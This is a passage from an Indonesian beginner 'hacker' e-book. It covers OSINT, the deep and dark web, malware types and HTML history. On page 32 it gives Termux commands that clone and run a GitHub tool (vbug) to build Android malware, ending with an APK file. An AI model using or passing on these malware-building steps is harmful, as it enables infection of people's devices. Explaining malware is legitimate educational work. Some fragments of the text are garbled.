Open port atau perangkat yang terhubung ke internet tanpa adanya jaminan
keamanan
Software yang tidak diupdate, seperti website yang menggunakan CMS versi
lama
Aset-aset yang bocor atau terekspose publik, seperti password-password, kode
serial number, dan lainnya.

Mengapa Open Source Intelligence penting?


OSINT sangat penting dalam mengawasi kekacauan informasi itu. TI perlu
memenuhi tiga tugas penting dalam OSINT, dan berbagai alat OSINT telah
dikembangkan untuk membantu memenuhi kebutuhan tersebut. Sebagian besar
alat melayani ketiga fungsi tersebut, meskipun banyak yang unggul dalam satu
bidang tertentu.

E-book Kelas 1 | 23
Apa Tujuan Menggunakan Open Source Intelligence?
Seperti yang ditunjukkan contoh di atas, OSINT sangat penting dan banyak
digunakan di berbagai macam industri. Mereka melayani tujuan yang sama,
yaitu untuk mendeteksi aktivitas yang berpotensi mencurigakan atau ilegal.
Mereka juga digunakan oleh perusahaan untuk melindungi diri mereka sendiri
dan klien mereka dari pelanggaran data dan privasi.
OSINT umumnya merupakan metode pengumpulan data yang lebih murah
dibandingkan dengan metode investigasi tradisional. Banyak tools OSINT
berbasis langganan, dan menawarkan berbagai paket kepada perusahaan
berdasarkan kebutuhan mereka.
Kecerdasan open source di media sosial terus diperbarui. Status Facebook
publik yang baru diperbarui seseorang, misalnya, akan lebih baru dan karenanya
relevan dibandingkan dengan artikel berita yang ditulis tentang mereka lima
tahun lalu.
Definisi undang-undang tentang OSINT juga menjamin bahwa itu adalah
praktik hukum. Undang-undang perlindungan data yang telah diperkenalkan
dalam beberapa tahun terakhir, seperti General Data Protection Regulation Uni
Eropa, memperkuat dasar hukum untuk OSINT. Selama perusahaan
menjalankan OSINT dalam batas-batas yang ditentukan dan sesuai dengan
hukum, semua informasi yang diperoleh adalah sah dan dapat digunakan.

Apa Kekurangan Open Source Intelligence?


OSINT terdengar kuat, tetapi bukan berari tidak memiliki kelemahan. Banyak
profesional yang menggunakan OSINT mengalami kelebihan informasi, dan
akan sangat memakan waktu bagi mereka untuk memfilter setiap detail.
Selanjutnya, saat menjalankan SOCMINT, sangat sulit untuk memverifikasi
keabsahan setiap detail yang dikumpulkan. Salah satu kelemahan tool OSINT
adalah banyak tools yang tidak memiliki fungsi pengecekan fakta, sehingga
membedakan berita yang benar dari berita palsu menjadi tugas yang sulit.

Teknik Mengumpulkan Informasi


Beberapa teknik yang digunakan untuk mengumpulkan dan memproses Open
Source Information:

E-book Kelas 1 | 24
Pertama, strategi dan framework harus jelas untuk memperoleh dan
menggunakan Open Source Intelligence. Tidak disarankan untuk menggunakan
pendekatan OSINT dengan perspektif sendiri walaupun kita dapat menemukan
sesuatu informasi yang menarik atau bermanfaat. Dengan banyaknya informasi
yang tersedia melalui sumber terbuka hanya akan membuat kita kewalahan jika
tidak menggunakan framework yang jelas. Sebagai gantinya, kita harus tau
persis apa tujuan kita menggunakan OSINT, misalnya untuk mengidentifikasi
atau memulihkan kelemahan pada jaringan kita, dan kemudian memfokuskan
pencarian secara khusus untuk tujuan tersebut.

Kedua, kita harus mengidentifikasi perangkat atau tools dan teknik yang
digunakan untuk mengumpulkan dan memproses Open Source Information.
Tanpa adanya perencanaan yang jelas, dan dengan jumlah informasi yang
tersedia terlalu besar maka prosesnya menjadi tidak efektif.
Secara umum, pengumpulan Open Source Information terbagi dalam dua
kategori yakni passive collection dan active collection.
Passive Collection sering melibatkan penggunaan Threat Intelligence Platform
untuk menggabungkan berbagai threat ke dalam suatu lokasi yang mudah
diakses. Beberapa solusi Threat Intelligence lainnya yakni dengan
menggunakan Artificial Intelligence, Machine Learning, Deep Learning, dan
Natural Language Processing (NLP) yang memproses secara otomatis dalam
memprioritaskan keputusan sesuai dengan kebutuhan dan tujuan dalam
melakukan pengumpulan dan analisa informasi.
Terkadang dengan cara yang sama, beberapa komunitas “hacker” terkadang
menggunakan botnet untuk mengumpulkan informasi berharga dengan
penggunaan teknik traffic snifing, keylogging.
Active collection juga menggunakan berbagai macam teknik untuk mencari
informasi spesifik. Untuk para Security Professional, jenis pekerjaan untuk
mengumpulkan informasi biasanya dilakukan karena alasan:
 Alert yang dikumpulkan secara pasif telah ditandai sebagai sebuah yang
berpotensi ancaman dan sebuah informasi yang diperlukan kemudian.
 Fokus dari pengumpulan intelligence sangat spesifik, seperti percobaan-
percobaan yang dilakukan oleh seorang penetration tester.
Untuk Cara-cara melakukan OSINT di Android kalian bisa memanfaatkan
GetContact, dan selengkapnya bisa dilihat divideo tutorial.

E-book Kelas 1 | 25
BAB 8
Apa Itu Deep Web?

Apa Itu Deep Web?


Deep web adalah halaman di website yang keberadaannya tidak dapat
ditemukan melalui mesin pencari konvensional seperti Google. Alasan mesin
pencari ini tidak dapat menemukan data deep web ketika dicari oleh user yaitu
karena tidak adanya index tautan pada situs-situs web tersebut. Jadi, mesin
pencari biasa tidak bisa mengidentifikasi apa isi dari deep web.
Jika dianalogikan, deep web ini seperti gunung es yang berada di bawah
permukaan internet. Jadi, internet yang selama ini dapat kamu temukan di
Google adalah ujung dari gunung es yang terlihat di permukaan sementara deep
web merupakan gunung es yang berada di bawah permukaan air laut, sehingga
tidak terlihat oleh semua orang.

Perbedaan Surface Web, Deep Web dan Dark Web

Surface web adalah halaman-halaman di internet yang dapat kamu temukan


melalui mesin pencari konvensional seperti Google, Yahoo, Bing, dan lain-lain.
Halaman surface web adalah situs yang bersifat publik, contohnya seperti blog
Dewaweb. Situs dalam kategori surface web dapat terindeks di mesin pencari,
dan pengguna dapat menemukan informasi melalui mesin pencari tersebut.
Selanjutnya Deep web merupakan situs yang digunakan untuk menyimpan
database yang bersifat rahasia. Sebagian besar konten deep web terdiri dari
informasi sensitif yang sebaiknya tidak dapat ditemukan di mesin pencari
seperti data perbankan, alamat email, dan nomor telepon pribadi.

E-book Kelas 1 | 26
Dengan menyembunyikan data pribadi dari publik dengan menggunakan
otentikasi seperti username dan password, deep web dapat membantu
melindungi privasi penggunanya.
Sementara itu, Dark web merupakan situs dan mesin pencari yang
kemungkinan sulit untuk ditemukan oleh pengguna awam. Sama seperti deep
web, dark web tidak dapat ditemukan melalui mesin pencari. Namun sebagian
konten yang berada di dark web bersifat ilegal dan tidak aman untuk konsumsi
publik.
Untuk mengakses dark web, pengguna diharuskan menggunakan protokol
jaringan tertentu atau aplikasi khusus seperti Tor browser. Domain website yang
ada pada dark web umumnya hanya menggunakan ekstensi domain .onion.
Sebagian besar situs yang ada di dalam deep web merupakan situs yang legal
serta aman. Beberapa di antaranya digunakan untuk menyimpan database yang
bersifat sangat rahasia dan memerlukan kredensial untuk mengaksesnya.
Selain itu, deep web juga digunakan sebagai intranet. Intranet adalah jaringan
internal untuk perusahaan, pemerintah, dan fasilitas pendidikan yang digunakan
untuk berkomunikasi serta mengontrol aspek secara pribadi dalam organisasi
mereka.

Apa Isi dari Deep Web?


Deep web adalah sebuah tempat di mana beberapa data terproteksi tidak dapat
diakses dan ditemukan dengan mudah oleh publik. Beberapa data tersebut
tentunya lebih aman ketika disimpan dalam deep web untuk mencegah
penyalahgunaan serta akses tanpa otorisasi.
Berikut ini beberapa contoh isi deep web yang lazim didengar orang awam:
• Data akun email pribadi
• Data akun media sosial pribadi
• Data akun perbankan online pribadi
• Data perusahaan yang disimpan di dalam database perusahaan itu sendiri
• Data yang terkandung di dalam database ilmiah dan akademik
• Data rekam medis
• Data berkas resmi

E-book Kelas 1 | 27
Data-data sensitif seperti di atas tadi tentunya tidak boleh disebarkan di internet
begitu saja. Maka dari itu hadirlah deep web untuk menampung data-data tadi
supaya lebih aman dari tindak pencurian data.

Nah, apakah seseorang bisa melihat konten-konten tersebut? Jawabannya bisa


saja tetapi akan sulit karena mereka harus masuk ke salah satu akun kemudian
memberikan nama pengguna, kata sandi, atau jenis otentikasi lainnya. Proses
otentikasi seperti ini merupakan hal yang baik untuk membuktikan bahwa hanya
pemilik akun yang bisa mengakses data tersebut.

Apa Risiko Mengakses Deep Web?


Meskipun deep web adalah bagian dari internet yang masih relatif aman, user
harus tetap berhati-hati bila ingin mengunjunginya. Sebab, bukan hanya kamu
yang sedang mengunjunginya. Bila tidak waspada, hacker dapat mendapatkan
identitas dan data-data penting melalui perangkat yang sedang kamu gunakan.
Untuk menghindari risiko terkena hack saat mengakses deep web, berikut ini
beberapa hal yang perlu kamu hindari saat mengunjungi deep web:
• Sembunyikan identitasmu
• Jauhi tautan berbahaya
• Hindari melakukan transaksi pembayaran di deep web
• Tetap waspada pada tiap jenis konten yang kamu cari
• Hindari percakapan dengan orang asing

Untuk cara-cara mengakses deep di Android, kalian bisa cek divideo


Tutorialnya.

E-book Kelas 1 | 28
BAB 9
Apa Itu Malware dan Apa Dampak Bahayanya?

Apa Itu Malware?


Sebenarnya, kata malware sendiri berasal dari proses blending dengan asal kata
malicious dan software sehingga terbentuklah kata malware. Malware ini dibuat
oleh orang yang tidak bertanggung jawab dan bertujuan untuk melakukan
tindakan kejahatan siber. Kejahatan-kejahatan tersebut di antaranya bisa berupa
penyebaran virus, pencurian data, wors, trojan, spyware, ransomware, dan juga
adware.
Penyebaran malware biasanya melalui koneksi internet seperti pengiriman
email, download file, themes, plugin dan program yang sudah disusupi
malware. Bahkan saat ini malware bisa menyerang server, sehingga website-
website yang berada di dalam server tersebut juga rentan terhadap serangan
malware.
Oleh karena itu, kalian harus bisa berhati-hati karena malware cukup
membahayakan keberlangsungan perangkat dan juga website yang dikelola.

Jenis-jenis Malware
1. Virus
Ini adalah pecahan dari malware. Virus dibuat untuk mengganggu kemampuan
penoperasian sebuah sistem. Biasanya, virus disematkan atau dilampirkan pada
sebuah dokumen file.
File atau dokumen ini mendukung macros untuk mengeksekusi kode dan
menyebarkannya dari satu host ke host lain. Ketika file ini terdownload,
virusnya masih dalam keadaan dormant (tidak aktif) hingga nantinya file ini
dibuka dan digunakan.
Alhasil, saat virus menyebar, akan muncul permasalahan seperti isu operasional
dan juga kehilangan data.

E-book Kelas 1 | 29
2. Trojan Horse Virus
Trojan horse, singkatnya adalah Trojan, adalah jenis malware yang menyamar
sebagai software resmi atau tidak mencurigakan.
Saat pengguna mendownload file yang memuat Trojan, virus ini akan
mendapatkan akses untuk data sensitif lalu memodifikasi, memblokir, atau
bahkan menghapus data tersebut.
Virus ini sangat berbahaya untuk performa perangkat kalian.

3. Worm
Tidak seperti Trojan, worm dapat mereplikasi dirinya sendiri dengan cepat ke
perangkat manapun dalam jaringan yang sama. Worm menjangkit sebuah
perangkat melalui sebuah file yang didownload atau melalui koneksi jaringan.
Ancaman yang dibawa oleh worm sama seperti virus, yaitu mengganggu
pengoprasian perangkat dan kehilangan data.

4. Adware
Malware yang satu ini dibuat untuk mencuri data dari komputer Anda dan
memunculkan iklan di perangkay yang dipakai. Mungkin ada beberapa Adware
yang tidak membahayakan, tapi seringnya malware ini dapat membahayakan
sistem kalian.
Bayangkan adware ini mengarahkan kita ke website yang berbahaya dan
website tersebut ternyata mengandung malware lain seperti Trojan, worm atau
spyware.
Selain itu, Adware yang muncul berlebihan dapat memperlambat kinerja sistem
perangkat yang digunakan

5. Spyware
Spyware adalah jenis malware yang secara diam-diam bekerja pada perangkat
Anda dan mengirim laporan yang didapatkan ke pembuat malware ini.
Alih-alih mengganggu sistem operasi perangkat, malware ini menyasar
informasi sensitif dan membuka remote access untuk pelaku.

E-book Kelas 1 | 30
Biasanya spyware digunakan untuk mencuri data-data seperti PIN ATM atau
internet banking, informasi pribadi, password email dan lain-lain.

6. Ransomware
Malware jenis ini masuk ke dalam sistem untuk mengakses informasi sensitif,
mengenkripsi informasi tersebut sehingga tidak dapat diakses oleh pengguna.
Nantinya, pelaku akan meminta sejumlah tebusan agar data Anda dikembalikan.
Umumnya, ransomware termasuk dalam kategori penipuan phishing.
Cara kerjanya adalah ransomware ini disembunyikan di dalam link. Jadi, ketika
pengguna mengklik link tersebut, ransomware akan masuk.

Cara Kerja Malware


Pada bagian ini, kami akan menjelaskan bagaimana malware dapat menginfeksi
perangkat dan juga website.

Instalasi Software
Apakah kalian pernah instal software crack atau bajakan? Jika pernah, maka
perlu waspada karena malware biasanya ada pada file software tersebut.
Untuk menghindarinya, kalian bisa melakukan download software pada website
resmi atau membeli software yang asli.

Download dan Buka File Asing


File download menjadi salah satu penyebab penyebaran malware paling banyak.
File-file seperti video, musik, pdf, gambar dan jenis file lainnya rawan sekali
untuk disisipi malicious software.
Pastikan sebelum mendownload tidak ada file dengan nama yang tidak sesuai
atau file dengan ekstensi yang berbeda dari seharusnya.

E-book Kelas 1 | 31
Bahaya Malware
Setelah membahas melalui apa saja malware bisa menginfeksi website dan
perangkat Anda, kini kami akan membahas berbagai macam efek buruk yang
ditimbulkan dari serangan malware.

Merubah Tampilan Website


Jika malware pada akhirnya sampai bisa masuk ke website, maka dampaknya
bisa berbahaya.
Salah satunya adalah merubah tampilan website atau website defacements.
Serangan ini tujuannya untuk membuat website Anda semakin turun reputasinya
karena diisi dengan konten-konten yang tidak relevan dengan aslinya sehingga
pengunjung mulai pergi dari website Anda.

Memunculkan Iklan yang Irelevan


Pernahkah web browser Anda memunculkan iklan-iklan aneh atau mesin
pencari tiba-tiba berubah jadi berbeda?
Jika pernah, maka bisa dipastikan komputer Anda sudah terinfeksi oleh
malware.
Cara mudah untuk mengetahuinya adalah Anda bisa melakukan scan dengan
antivirus agar malwarenya terdeteksi dan dapat dihilangkan.

Tidak Dapat Mengakses Website


Paling parahnya jika malware menyerang website, maka akses user login dan
password bisa dicuri. Untuk mengatasinya Anda bisa mengganti URL login
wordpress agar lebih aman.

Pencurian Data
Data sangat penting untuk dijaga, jika sampai data Anda diretas oleh malware,
besar kemungkinan data tersebut digunakan untuk tindak kejahatan.
Data yang sering dicari-cari antara lain, user dan password, akun email, credit
card dan akun keuangan lainnya.

E-book Kelas 1 | 32
Berikut cara-cara membuat virus Malware di Android menggunakan Termux:
 $ apt update && apt upgrade

 $ apt install python

 $ apt install python2

 $ git clone https://github.com/Gameye98/vbug

 $ cd vbug

 $ python2 vbug.py

 $ termux-setup-storage

 $ mv FBCR2K18.apk/sdcard

Untuk tutorial lebih lengkap tonton video tutorialnya ya!

E-book Kelas 1 | 33
BAB 10
Sejarah HTML (Awal Sejarah Sebuah Website)

HTML atau Hypertext Markup Language adalah bahasa markup yang


digunakan untuk membuat struktur halaman website agar dapat ditampilkan
pada web browser. Jadi, HTML dapat dianalogikan sebagai pondasi awal dalam
menyusun kerangka halaman web secara terstruktur sebelum membahas terkait
tampilan desain dan sisi fungsionalitas.
HTML Ini dapat dibantu oleh teknologi seperti Cascading Style Sheets (CSS)
dan bahasa skrip lainnya seperti JavaScript, VBScript, dan PHP.

Sejarah
Pada tahun 1980 seorang ahli fisika, Tim Berners-Lee, dan juga seorang
kontraktor di CERN (Organisasi Eropa untuk Riset Nuklir) mengusulkan dan
menyusun ENQUIRE, sebuah sistem untuk ilmuwan CERN dalam membagi
dokumen. Sembilan tahun kemudian, Berners-Lee mengusulkan adanya sistem
markah berbasis internet.[2] Berners-Lee menspesifikasikan HTML dan menulis
jaringan beserta perangkat lunaknya di akhir 1990. Pada tahun yang sama,
Berners-Lee dan Robert Cailliau, insinyur sistem data CERN berkolaborasi
dalam sebuah permintaan untuk pendanaan, namun tidak diterima secara resmi
oleh CERN. Di catatan pribadinya[3] sejak 1990 dia mendaftar[4] "beberapa
dari banyak daerah yang menggunakan hypertext" dan pertama-tama
menempatkan sebuah ensiklopedia.

E-book Kelas 1 | 34
Penjelasan pertama yang dibagi untuk umum dari HTML adalah sebuah
dokumen yang disebut "Tanda HTML", pertama kali disebutkan di Internet oleh
Tim Berners-Lee pada akhir 1991.[5] Tanda ini menggambarkan 18 elemen
awal mula, versi sederhana dari HTML. Kecuali untuk tag hyperlink, yang
sangat dipengaruhi oleh SGMLguid, in-house Standard Generalized Markup
Language (SGML) berbasis format dokumen di CERN. Sebelas elemen ini
masih ada di HTML 4.[6]

HTML adalah bahasa markah yang digunakan peramban untuk menafsirkan dan
menulis teks, gambar dan bahan lainnya ke dalam halaman web secara visual
maupun suara. Karakteristik dasar untuk setiap item dari markah HTML
didefinisikan di dalam peramban, dan karakteristik ini dapat diubah atau
ditingkatkan dengan menggunakan tambahan halaman web desainer CSS.
Banyak elemen teks ditemukan di laporan teknis ISO pada tahun 1988 TR 9537
Teknik untuk menggunakan SGML, yang pada gilirannya meliputi fitur bahasa
format teks awal seperti yang digunakan oleh komandan RUNOFF
dikembangkan pada awal 1960-an untuk sistem operasi: perintah-perintah
format ini berasal dari perintah yang digunakan oleh pengetik untuk memformat
dokumen CTSS secara manual. Namun, konsep SGML dari markah umum
didasarkan pada unsur-unsur daripada hanya efek cetak, dengan pemisahan
struktur dan markah juga; HTML telah semakin bergerak ke arah ini dengan
CSS.

 Wayback Machine. sebagai sebuah hyperlink ke URL tertentu),


 Elemen widget yang membuat objek-objek lain seperti tombol
(<button>), daftar (<li>), dan garis horizontal (<hr>). Konsep hiperteks
pada HTML memungkinkan pembuatan tautan pada suatu kelompok kata
atau frasa untuk menuju ke bagian manapun dalam World Wide Web,

Ada tiga macam pranala (link) yang dapat digunakan:


• Pranala menuju bagian lain dari page.
• Pranala menuju page lain dalam satu web site.
• Pranala menuju resource atau web site yang berbeda.[14]

E-book Kelas 1 | 35
Selain markup presentasional, markup yang lain tidak menentukan bagaimana
tampilan dari sebuah tulisan. Namun untuk saat ini, penggunaan tag HTML
untuk menentukan tampilan telah dianjurkan untuk mulai ditinggalkan, dan
sebagai gantinya digunakan Cascading Style Sheets.

Contoh dokumen HTML sederhana:

<!DOCTYPE html>
<html lang="en">
<head>
<title>For Everyone</title>
</head>
<body>
<p>Hallo, Dunia!</p>
</body>
</html>

E-book Kelas 1 | 36
PENUTUP

Dalam E-book ini, kami telah membahas topik-topik yang penting dan relevan.
Kami berharap dapat memberikan manfaat bagi pembaca dan membantu mereka
memperluas pengetahuan mereka tentang topik ini. Diharapkan ilmu ini dapat
digunakan sebik mungkin dan tentang penyalahgunaan apapun itu diluar
tanggung jawab pihak MATA HACKER.
Terima kasih telah membaca E-book kami.

THANKS TO READING

E-Book Kelas 1 | 37

Anda mungkin juga menyukai